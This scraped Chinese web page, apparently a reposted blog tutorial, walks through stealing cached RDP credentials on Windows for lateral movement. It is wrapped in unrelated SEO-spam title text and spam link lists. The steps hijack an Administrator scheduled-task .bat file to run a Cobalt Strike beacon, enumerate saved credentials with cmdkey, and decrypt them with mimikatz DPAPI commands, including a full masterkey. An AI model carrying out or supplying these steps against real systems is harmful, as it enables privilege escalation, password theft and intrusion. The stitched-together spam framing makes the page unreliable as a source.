当前位置: 首页 > wzjs >正文

网站建设 面试题什么是新媒体营销

网站建设 面试题,什么是新媒体营销,制作ppt的步骤,wordpress twilight saga 主题RDP(远程桌面协议)在连接过程中会缓存凭据,尤其是在启用了 "保存密码" 或 "凭据管理器" 功能时。这个缓存的凭据通常是用于自动填充和简化后续连接的过程。凭据一般包含了用户的用户名和密码信息,或者是经过加…

RDP(远程桌面协议)在连接过程中会缓存凭据,尤其是在启用了 "保存密码" 或 "凭据管理器" 功能时。这个缓存的凭据通常是用于自动填充和简化后续连接的过程。凭据一般包含了用户的用户名和密码信息,或者是经过加密的身份验证令牌

所以我们想登录这个rdp缓存,就是先找到凭证,再通过mimikatz来解密凭证,获取明文

0x01 以administrator权限上线

WIN+R 输入taskschd.msc

打开任务计划程序

找到批处理文件(.bat) 是Administrator创建的,找到他的目录

写入cs马子

后在任务计划程序运行net.bat

就成功上线了

注意:不是说找到一个由administrator创建的.bat文件就行,而是说在计划任务中,这个由administrator创建的.bat可以以administrator的身份去运行。

0X02 找到RDP凭据

用administrator权限来执行下面的命令

cmdkey /list

发现存在凭证后

再用里面的文件浏览功能

之后找到下面的凭据

再次说明,这个凭据是因为administrator在RDP其他主机的时候,选择了记住我的凭证功能,然后在本地保留了一个凭证

0x03 获取guidMasterKey

privilege::debug
dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\F18D03964B3469BAEA4542A7792D663B

0x04 获取MasterKey对应的

privilege::debug 
sekurlsa::dpapi

0x05 拿MasterKey进行解密

 mimikatz dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\F18D03964B3469BAEA4542A7792D663B /masterkey:2af578e7d889e691901422cabdd559e42d0a03882073e7ca46abc03422547ec7108113dc8928326cc181c69b6eff2fa7d87a06254474f0a892f9c183d56aae55

找到明文密码 就可以登录,达到横向移动->RDP的渗透手法

http://www.dtcms.com/wzjs/365789.html

相关文章:

  • wordpress电子商务站新闻头条新闻
  • 惠州网站制作工具做seo需要投入的成本
  • 政府门户网站建设内容下店拓客团队
  • 网站开发过时了投广告的平台有哪些
  • 公司网站建设找谁2023年8月新冠又来了
  • 网站城市分站是怎么做的无锡seo关键词排名
  • 做通路富集分析的网站网站制作大概多少钱
  • 网页魔域seo培训班
  • 绿色环保企业网站模板网站外链工具
  • 东莞横沥网站制作单页站好做seo吗
  • 沈阳网站seo优化哪家好百度seo如何快速排名
  • 网站建设书籍论文网站推广具体内容
  • 中国铁路建设行业协会网站网络营销个人总结
  • 合肥营销型网站建设公司靠谱seo外包定制
  • 北京企业建站程序高端网站建设企业
  • 微信公众号的字体和wordpress优化方案官网
  • 做甜品台的网站同城推广平台
  • 网站怎么做海外推广爱站网反链查询
  • 门户网站建设价格广西南宁市有公司网站设计
  • 清理网站后台缓存百度数据中心
  • Php做网站创业北京朝阳区疫情最新情况
  • .net网站做优化网站媒体推广方案
  • java直播网站怎么做免费网站排名优化软件
  • 艾迪网络专业的网站建设公司东莞做网站的公司有哪些
  • 创新的医疗网站建设昆明网站seo服务
  • 做视频网站需要哪些技术淘宝seo推广优化
  • 保健品做哪个网站好百度搜索收录
  • 网站建设对接模版推广软件赚钱的平台
  • 用手机怎么做网站谷歌商店下载
  • 做菠菜网站代理谷歌paypal官网注册入口